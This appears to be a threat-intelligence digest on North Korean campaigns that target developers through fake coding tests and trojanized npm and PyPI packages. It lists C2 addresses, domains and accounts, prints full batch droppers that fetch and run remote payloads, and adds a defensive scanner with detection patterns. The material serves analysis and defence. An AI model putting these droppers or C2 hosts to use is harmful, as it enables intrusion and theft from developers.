  • Github:: Allgoritex
  • Github:: bohinskamariia
  • Github:: danil33110
  • Github:: aluxiontemp
  • Github:: komeq1120
  • Github:: aufeine Account active since 2024-04-15
  • Github:: dhayaprabhu Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
  • Github:: MatheeshaMe Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
  • Github:: Satyam-G5 Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
  • Github:: emadmohd211 Account active since 2021
  • Github:: alifarabi Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
  • Bitbucket:: juandsuareza
  • Bitbucket:: freebling
  • 172.86.97.80:1224
  • 172.86.123.35:1244
  • 147.124.212.89:1244
  • 147.124.212.146:1244
  • 147.124.213.11:1244
  • 147.124.213.29:1244
  • 147.124.214.129:1244
  • 147.124.214.131:1244
  • 147.124.214.237:1244
  • 67.203.7.171:1244
  • 67.203.7.245:1244
  • 91.92.120.135:3000
  • 45.61.131.218:1245
  • 173.211.106.101:1245
  • Python Trojan, with C2 at 45.61.131.218:1245
  • Download a Python script for deploying AnyDesk from the URL /adc/ of the first-stage C2 server (147.124.214.237:1244)

US court orders forfeiture of 279 crypto accounts tied to North Korea laundering

Date:: 2024-05-10 URL:: https://nknews.org/2024/05/us-court-orders-forfeiture-of-279-crypto-accounts-tied-to-north-korea-laundering/ Tags:: Money Laundering Details::

  • A U.S. court has ordered the forfeiture of nearly 300 cryptocurrency accounts linked to North Korea’s laundering of millions of dollars in stolen assets, underscoring Washington's increasing efforts to crack down on illicit cyber activities funding Pyongyang’s nuclear ambitions. Indicators::

Exclusive: North Korea laundered $147.5 mln in stolen crypto in March, say UN experts

Date:: 2024-05-14 URL:: https://reuters.com/technology/cybersecurity/north-korea-laundered-1475-mln-stolen-crypto-march-say-un-experts-2024-05-14/ Tags:: Money Laundering Details::

  • North Korea laundered $147.5 million through virtual currency platform Tornado Cash in March after stealing it last year from a cryptocurrency exchange, according to confidential work by United Nations sanctions monitors seen by Reuters on Tuesday. Indicators::

Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says

Date:: 2024-05-16 URL:: https://justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north https://archive.ph/nWug9 Tags:: DPRK-IT Details::

  • As alleged in the court documents, DPRK has dispatched thousands of skilled IT workers around the world, who used stolen or borrowed U.S. persons’ identities to pose as domestic workers, infiltrate domestic companies’ networks, and raise revenue for North Korea. The schemes described in court documents involved defrauding over 300 U.S. companies using U.S. payment platforms and online job site accounts, proxy computers located in the United States, and witting and unwitting U.S. persons and entities. This announcement includes the largest case ever charged by the Justice Department involving this type of IT workers’ scheme. Indicators::

Microsoft: Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks

Date:: 2024-05-28 URL:: https://microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ https://advantage.mandiant.com/reports/22-00021780 Tags:: DPRK-IT Details::

  • formerly Storm-1789
  • Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a fully functional malicious game, and deliver a new custom ransomware.
  • While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.
  • Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.
  • Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.
  • In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022
  • Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar.com and defitankzone.com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.
  • Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:
  • Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.
  • From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI. Indicators::
  • bestonlinefilmstudio.org
  • blockchain-newtech.com
  • ccwaterfall.com
  • chaingrown.com
  • defitankzone.com
  • detankwar.com
  • freenet-zhilly.org
  • matrixane.com
  • pointdnt.com
  • starglowventures.com
  • mingeloem.com

From Opportunity to Threat: My Encounter with a Blockchain Job Scam

Date:: 2024-05-29 URL:: https://medium.com/@mahitman1/from-opportunity-to-threat-my-encounter-with-a-blockchain-job-scam-9e0457754298 Tags:: DPRK-CI Details::

  • Here’s an excerpt from the hiring form: “Provide estimation. After running the existing Node.js backend, you will get an API-website on port 5000. Through this API-website, check all the functions [including function name & params] of the smart contract you will develop. Indicators::
  • git clone github.com/Sudi857/reward_backend.git

UNC4899 Insights on Cyber Threats Targeting Users and Enterprises in Brazil

Date:: 2024-06-12 URL:: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil https://support.google.com/a/answer/9007870?hl=en Tags:: DPRK-IT Details::

  • North Korean Government-Backed Groups Targeting Brazil
  • Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil.
  • North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors.
  • Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
  • In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware.
  • To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm.
  • If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test.
  • The instructions directed users to download and run a project hosted on GitHub.
  • The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
  • North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry.
  • In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm.
  • In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities.
  • Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++.
  • The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp.
  • The campaigns were consistent with Operation DreamJob and activity previously described by Google.
  • In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
  • One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern.
  • In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit, a fake PDF viewer that presents users with a login prompt to enter their credentials in order to view the lure document.
  • In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
  • One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles.
  • Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem. Indicators::

New Tactics from a Familiar Threat

Date:: 2024-07-08 URL:: https://blog.phylum.io/new-tactics-from-a-familiar-threat/ Tags:: Details::

  • https://otx.alienvault.com/indicator/domain/cryptocopedia.com
  • It contained all the functional code and tests from call-bind but with a modified package.json file and five additional files: shim.js, polyfill.js, implementation.js, callTo.js, and mod.json
  • '@echo off\ncurl -o funData.ctr -L https://cryptocopedia.com/explorer/search.asp?token=5032 > nul 2>&1\nstart /b /wait powershell.exe -ExecutionPolicy Bypass -File towr.ps1 > nul 2>&1\ndel towr.ps1 > nul 2>&1\nif exist stringh.dat (\ndel stringh.dat > nul 2>&1\n)\nrename colfunc.csv stringh.dat > nul 2>&1\nif exist stringh.dat (\nrundll32 stringh.dat, SetExpVal tiend\n)\nif exist mod.json (\ndel package.json > nul 2>&1\nrename mod.json package.json > nul 2>&1\n)\nping 127.0.0.1 -n 2 > nul\nif exist stringh.dat (\ndel stringh.dat > nul 2>&1\n)';
  • The third part replaces the original package.json with the contents of mod.json to remove the preinstall script Indicators::
  • call-bind
  • call-blockflow
  • react-tooltip-modal

Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry...

Date:: 2024-07-08 URL:: https://twitter-thread.com/t/1810455262320570416 Tags:: Details::

  • Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry.
  • They rekt more people, companies, protocols than anyone else.
  • But it's good to know exactly how they get in. Bc another smart contract audit won't save you. Indicators::

Decipher: New Version of BeaverTail macOS Malware Identified

Date:: 2024-07-15 URL:: https://duo.com/decipher/new-version-of-beavertail-macos-malware-identified Tags:: DPRK-CI Details::

  • Researchers have identified a new tool that attackers affiliated with the North Korean government have developed that is designed to look like a legitimate browser-based video call application and can be used to exfiltrate information from infected machines.
  • MiroTalk is a free video call service that is browser-based and does not require an app download. Indicators::

Patrick Wardle: This Meeting Should Have Been an Email (BeaverTail)

Date:: 2024-07-15 URL:: https://objective-see.org/blog/blog_0x7A.html Tags:: DPRK-CI Details::

DPRK threat actors distributing BeaverTail

Date:: 2024-07-19 URL:: https://x.com/1ZRR4H/status/1814476691911090466 Tags:: DPRK-CI Details::

  • Fake job offers used in this campaign 🇰🇵 and published on multiple web portals:
  • [LinkedIn]: Senior blockchain developer needed → https://linkedin[.]com/jobs/view/senior-blockchain-developer-needed-at-hirog-3974975235/
  • [WellFound]: Ecommerce Developer with Web3 Integration (3+ years exp) → https://wellfound[.]com/jobs/3055218-ecommerce-developer-with-web3-integration
  • [PeoplePerHour]: I need senior blockchain developer for our online store → https://peopleperhour[.]com/freelance-jobs/technology-programming/e-commerce-cms-development/i-need-senior-blockchain-developer-for-our-online-store-4235812
  • [ZipRecruiter]: Blockchain developer needed → https://ziprecruiter[.]com/c/HiroG/Job/Blockchain-developer-needed/-in-Califon,NJ?jid=6bf13a7b9c0139d4
  • [WayUp]: Blockchain developer needed → https://wayup[.]com/i-j-HiroG-313478541129579/
  • [Recruiter]: Link is no longer available. Indicators::
  • onlinestoreforhirog[.]zip
  • files[.]hirog[.]io/onlinestoreforhirog[.]zip

KnowBe4: How a North Korean Fake IT Worker Tried to Infiltrate Us

Date:: 2024-07-24 URL:: https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us Tags:: DPRK-IT Details::

  • KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware. Indicators::

North Korean State Actors Exploit Open Source Supply Chain via Malicious npm Package

Date:: 2024-07-24 URL:: https://stacklok.com/blog/north-korean-state-actors-exploit-open-source-supply-chain-via-malicious-npm-package Tags:: Details::

  • node <script>.js && del <script>.js
  • @echo off\ncurl -o though.crt -L https://166.88.61.72/explorer/search.asp?token=3092 > nul 2>&1\nstart /b /wait powershell.exe -ExecutionPolicy Bypass -File yui.ps1 > nul 2>&1\ndel yui.ps1 > nul 2>&1\nif exist soss.dat (\ndel soss.dat > nul 2>&1\n)\nrename tmpdata.db soss.dat > nul 2>&1\nif exist soss.dat (\nrundll32 soss.dat, SetExpVal tiend\n)\nif exist mod.json (\ndel package.json > nul 2>&1\nrename mod.json package.json > nul 2>&1\n)\nping 127.0.0.1 -n 2 > nul\nif exist soss.dat (\ndel soss.dat > nul 2>&1\n) Indicators::
  • next-react-notify
  • call-bind
  • tocall.js
  • next-react-notify-1.0.0.tgz
  • github.com/StacklokLabs/jail/tree/main/npm/next-react-notify
  • 166.88.61[.]72
  • Second-stage DLL soss.dat

APT45: North Korea’s Digital Military Machine

Date:: 2024-07-25 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine Tags:: APT45 Details::

  • APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009.
  • APT45 has gradually expanded into financially-motivated operations, and the group’s suspected development and deployment of ransomware sets it apart from other North Korean operators.
  • APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43.
  • Among the groups assessed to operate from the Democratic People's Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Indicators::

U.S. DOJ: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers (Andariel)

Date:: 2024-07-25 URL:: https://justice.gov/opa/pr/north-korean-government-hacker-charged-involvement-ransomware-attacks-targeting-us-hospitals Tags:: Andariel Details::

  • Hacking Group Known as Andariel Used Ransom Proceeds to Fund Theft of Sensitive Information from Defense and Technology Organizations Worldwide, Including U.S. Government Agencies Indicators::

A Year-Long Campaign of North Korean Actors Targeting Developers via Malicious npm Packages

Date:: 2024-08-07 URL:: https://zero.checkmarx.com/a-year-long-campaign-of-north-korean-actors-targeting-developers-via-malicious-npm-packages-dbf7a6761361 Tags:: Details::

  • July 2024 saw a surge in reports from multiple security firms detailing North Korean threat actors targeting developers through malicious npm packages. These reports highlight the continuation and intensification of a campaign that has been ongoing for close to a year now. While the core structure of the malicious code has remained remarkably similar throughout the campaign, the threat actors have been consistently evolving their social engineering tactics to increase their chances of compromising target systems. Indicators::
  • call-blockflow
  • yuriwil32 yuriwilliam32@outlook.com
  • harthat-api
  • harthat-chain
  • ogremagikenedy68@outlook.com
  • harthat-cookie
  • ogremagikenedy68@outlook.com
  • harthat-hash
  • nagasirenwilliam978@outlook.com
  • next-react-notify
  • johnmurphy928@outlook.com
  • cryptocopedia.com/explorer/search.asp?token=5032
  • 142.111.77.196/user/user.asp?id=237596
  • 142.111.77.196/user/user.asp?id=G6A822B
  • 142.111.77.196/manage/manage.asp?id=745681
  • 142.111.77.196/user/user.asp?id=518437
  • 142.111.77.196

Malicious npm Packages

Date:: 2024-08-29 URL:: https://blog.phylum.io/north-korea-still-attacking-developers-via-npm/ https://thehackernews.com/2024/08/north-korean-hackers-target-developers.html Tags:: DPRK-CI Details::

  • In the past few weeks, we've observed a renewed surge of activity from groups aligned with North Korean objectives, publishing several packages to npm. This latest wave appears to involve multiple groups or at least exhibits several distinct publication patterns, TTPs (Tactics, Techniques, and Procedures), and attack types we've seen in the past. The renewed surge began on August 12, 2024, with the publication of temp-etherscan-api and two versions of ethersscan-api. Approximately a week and a half later, telegram-con and another version of ethersscan-api were published. These packages appear to contain similar malware, including qq-console, published two weeks later on August 27. Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as Contagious Interview. Indicators::
  • 167.88.36.13 Hostinger Boston, MA
  • 45.61.158.14 RouterHosting Dallas, TX Remote Desktop
  • 95.164.17.24 STARK INDUSTRIES Meppel, NL
  • ethersscan-api
  • helmet-validate
  • ipcheck.cloud
  • mirotalk.net
  • nicholasmagill9203@hotmail.com
  • qq-console
  • richard96mars@gmail.com
  • sass-notification
  • telegram-con
  • temp-etherscan-api

CVE-2024-7971: North Korean threat actor Citrine Sleet exploiting Chromium zero-day

Date:: 2024-08-30 URL:: https://microsoft.com/en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/ https://bleepingcomputer.com/news/security/north-korean-hackers-exploit-chrome-zero-day-to-deploy-rootkit/ https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html https://nvd.nist.gov/vuln/detail/CVE-2024-7971 https://nvd.nist.gov/vuln/detail/CVE-2024-4947 https://nvd.nist.gov/vuln/detail/CVE-2024-5274 https://asec.ahnlab.com/wp-content/uploads/2022/09/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD_Sep-22-2022.pdf https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/ Tags:: Applejeus, Citrine Sleet, CVE Details::

  • Type confusion vulnerability in the V8 JavaScript engine
  • Citrine Sleet most commonly infects targets with the unique trojan malware it developed, AppleJeus, which collects information necessary to seize control of the targets’ cryptocurrency assets. The FudModule rootkit described in this blog has now been tied to Citrine Sleet as shared tooling with Diamond Sleet. Indicators::
  • voyagorclub.space

DeFied Expectations — Examining Web3 Heists

Date:: 2024-09-03 URL:: https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists/ Tags:: RustBucket Details::

  • Crypto exchange heists typically involve a series of events that map to the Targeted Attack Lifecycle. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.
  • Recently, Mandiant observed a similar recruiting theme which delivered a malicious PDF disguised as a job description for VP of Finance and Operations at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as RUSTBUCKET, which is a backdoor written in Rust that supports file execution. The backdoor collects basic system information, communicates with a URL provided via the command line, and in this instance persisted via a Launch Agent disguised as Safari Update with a command-and-control (C2 or C&C) domain autoserverupdate.line.pm.
  • The following snippet shows example decrypted AWS EC2 SSM Parameters identified in AWS CloudTrail logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. Approximately one hour later the wallets were drained resulting in a loss of over $100 million. Indicators::

FBI: North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks

Date:: 2024-09-03 URL:: https://ic3.gov/PSA/2024/PSA240903 Tags:: Details::

  • The FBI has observed the following list of potential indicators of North Korean social engineering activity:
  • Requests to execute code or download applications on company-owned devices or other devices with access to a company’s internal network.
  • Requests to conduct a pre-employment test or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
  • Offers of employment from prominent cryptocurrency or technology firms that are unexpected or involve unrealistically high compensation without negotiation.
  • Offers of investment from prominent companies or individuals that are unsolicited or have not been proposed or discussed previously.
  • Insistence on using non-standard or custom software to complete simple tasks easily achievable through the use of common applications (i.e. video conferencing or connecting to a server).
  • Requests to run a script to enable call or video teleconference functionalities supposedly blocked due to a victim's location.
  • Requests to move professional conversations to other messaging platforms or applications.
  • Unsolicited contacts that contain unexpected links or attachments. Indicators::

APT Lazarus: Eager Crypto Beavers, Video calls and Games

Date:: 2024-09-04 URL:: https://group-ib.com/blog/apt-lazarus-python-scripts/ Tags:: DPRK-CI Details::

  • Contagious Interview, BeaverTail, InvisibleFerret, FCCCall
  • Recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated versions in Windows and Python releases
  • Campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as a Javascript malware in November 2023, but recently a native macOS version of BeaverTail was discovered in July 2024.
  • Actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others
  • The malicious Javascript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the scripts property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js. Indicators::
  • freeconference.io
  • mirotalk.net
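The manifest-level checks a defender can run over a project received as a "coding test", covering the preinstall hook plus mod.json swap described in the Phylum and Stacklok entries above and the server/server.js entry point added to the scripts property that the Group-IB entry describes. This is an added example, not code from any of those reports; the sample manifests and the demo project tree are constructed, with only tocall.js and the server/server.js and middlewares/helpers/error.js paths taken from the quoted text.

```python
"""Triage helper for an npm project tree, written for the trojanized package.json
patterns quoted above: a lifecycle hook that runs and then deletes a dropper, a spare
mod.json staged to replace package.json, and a start script pointed at a bundled file.
Added example, not code from Phylum, Stacklok or Group-IB."""
import json
import re
import tempfile
from pathlib import Path

# Hooks npm executes automatically during install, before anyone reads the code.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Command fragments seen in the quoted droppers (run-then-erase, download, policy bypass, DLL load).
SUSPICIOUS_FRAGMENTS = [
    (re.compile(r"&&\s*(del|rm)\s", re.I), "runs a file and then deletes it (self-cleaning dropper)"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "downloads content from a script"),
    (re.compile(r"powershell(\.exe)?\b.*-ExecutionPolicy\s+Bypass", re.I), "bypasses PowerShell execution policy"),
    (re.compile(r"\brundll32\b", re.I), "loads a DLL via rundll32"),
]
NODE_ENTRY_RE = re.compile(r"\bnode\s+(\S+\.js)\b")
LOCAL_REQUIRE_RE = re.compile(r"""require\(\s*['"](\.{1,2}/[^'"]+)['"]\s*\)""")


def scan_package_json(text):
    """Return a list of human-readable findings for one package.json document."""
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"package.json is not valid JSON: {exc}"]
    findings = []
    for name, cmd in (pkg.get("scripts") or {}).items():
        if name in LIFECYCLE_HOOKS:
            findings.append(f"lifecycle hook '{name}' runs automatically on install: {cmd}")
        for pattern, why in SUSPICIOUS_FRAGMENTS:
            if pattern.search(cmd):
                findings.append(f"script '{name}' {why}: {cmd}")
        entry = NODE_ENTRY_RE.search(cmd)
        if entry and name not in LIFECYCLE_HOOKS:
            findings.append(f"script '{name}' boots bundled file {entry.group(1)}; read it before running")
    return findings


def node_entries(text):
    """Return (script name, .js path) for every script that executes a bundled file with node."""
    try:
        scripts = json.loads(text).get("scripts") or {}
    except (json.JSONDecodeError, AttributeError):
        return []
    out = []
    for name, cmd in scripts.items():
        match = NODE_ENTRY_RE.search(cmd)
        if match:
            out.append((name, match.group(1)))
    return out


def local_requires(js_source):
    """Relative require() targets in a JS file, e.g. '../middlewares/helpers/error.js'."""
    return LOCAL_REQUIRE_RE.findall(js_source)


def scan_package_dir(root):
    """Scan every package.json under root (skipping node_modules) and follow node entry files."""
    root = Path(root)
    report = {}
    for pj in root.rglob("package.json"):
        if "node_modules" in pj.parts:
            continue
        text = pj.read_text(encoding="utf-8", errors="replace")
        findings = scan_package_json(text)
        for name, entry in node_entries(text):
            entry_file = pj.parent / entry
            if entry_file.is_file():
                reqs = local_requires(entry_file.read_text(encoding="utf-8", errors="replace"))
                if reqs:
                    findings.append(f"entry {entry} (script '{name}') loads local modules: {', '.join(reqs)}")
        # The quoted dropper renames mod.json over package.json to erase the hook after it fires.
        if (pj.parent / "mod.json").is_file():
            findings.append("mod.json staged beside package.json (replacement manifest)")
        if findings:
            report[str(pj.relative_to(root))] = findings
    return report


# Constructed sample manifests; the script names and tocall.js come from the reports quoted above.
CLEAN_MANIFEST = '{"name": "demo-pkg", "scripts": {"test": "jest", "build": "tsc"}}'
TROJAN_MANIFEST = ('{"name": "demo-pkg", "scripts": {'
                   '"preinstall": "node tocall.js && del tocall.js", '
                   '"start": "node server/server.js"}}')


def demo():
    """Build a constructed project tree in a temp dir and return the scan report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "package.json").write_text(TROJAN_MANIFEST)
        (root / "mod.json").write_text(CLEAN_MANIFEST)  # hook-free manifest staged for the swap
        (root / "server").mkdir()
        (root / "server" / "server.js").write_text(
            "module.exports = require('../middlewares/helpers/error.js');\n")
        (root / "node_modules" / "dep").mkdir(parents=True)
        (root / "node_modules" / "dep" / "package.json").write_text(TROJAN_MANIFEST)
        return scan_package_dir(root)
```

Calling demo() returns five findings for the constructed tree: the preinstall hook, its run-then-delete pattern, the bundled start entry, that entry's local require of middlewares/helpers/error.js, and the staged mod.json; point scan_package_dir() at an unpacked "coding test" to get the same report for real input.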

Threat Assessment: North Korean Threat Groups

Date:: 2024-09-09 URL:: https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/ Tags:: Details::

  • Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army. Over the years, the RGB has revealed at least six threat groups:
  • Alluring Pisces (Bluenoroff)
  • Gleaming Pisces (Citrine Sleet)
  • Jumpy Pisces (Andariel)
  • Selective Pisces (TEMP.Hermit)
  • Slow Pisces (TraderTraitor)
  • Sparkling Pisces (Kimsuky) Indicators::

Fake recruiter coding tests target devs with malicious Python packages

Date:: 2024-09-10 URL:: https://reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages Tags:: Pyperclip Details::

  • VMConnect, first identified in August 2023
  • New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
  • The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the `__init__.py` file and its corresponding compiled Python file (PYC) inside the `__pycache__` directory of the respective modules.
  • Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a homework task. The developer was asked to find the bug, resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that the developer executed the project on his machine. Indicators::
  • Python_Skill_Assessment.zip
  • Python_Skill_Test.zip
  • Github:: ponpon262612
  • Capital One Skills Test

Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware

Date:: 2024-09-11 URL:: https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html Tags:: Pyperclip Details::

  • Malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.
  • `__init__.py` file and its corresponding compiled Python file (PYC) inside the `__pycache__` directory of the respective modules
  • requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
  • Capital One and Rookery Capital Limited Indicators::

Targeted attacks amid FBI Warnings

Date:: 2024-09-16 URL:: https://jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/ Tags:: zsh Details::

  • On September 3, 2024 the Federal Bureau of Investigation (FBI) released a public service announcement warning those in the crypto industry that the Democratic People's Republic of Korea (DPRK aka North Korea) has been targeting individuals with clever social engineering techniques for the successful delivery of malware.
  • Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
  • The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.
  • Requests to conduct a pre-employment test or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
  • The other stage two malware that is downloaded (zsh_env) simply sets up persistence via the .zshrc configuration. This ensures that any time the user opens a zsh shell moving forward, the malware will also be executed. This is a technique that likely ends up being reliable given the attacker knows they’re targeting a developer who will likely use the Terminal, again causing the backdoor to be run in the background.
  • VisualStudioHelper acts as an automated infostealer, can operate as a standard backdoor when invoked by cron and communicates with wiresapplication[.]com.
  • zsh_env operates as a backdoor, does not automate any of the infostealer functionality, persists via the zshrc config file, and uses a command and control server at juchesoviet48[.]com. Indicators::
  • TestProject/SlackToCsv.csproj
  • taurihostmetrics[.]com
  • wiresapplication[.]com
  • zsh_env communicates with juchesoviet48[.]com
  • Project.zip (Coding Challenge)

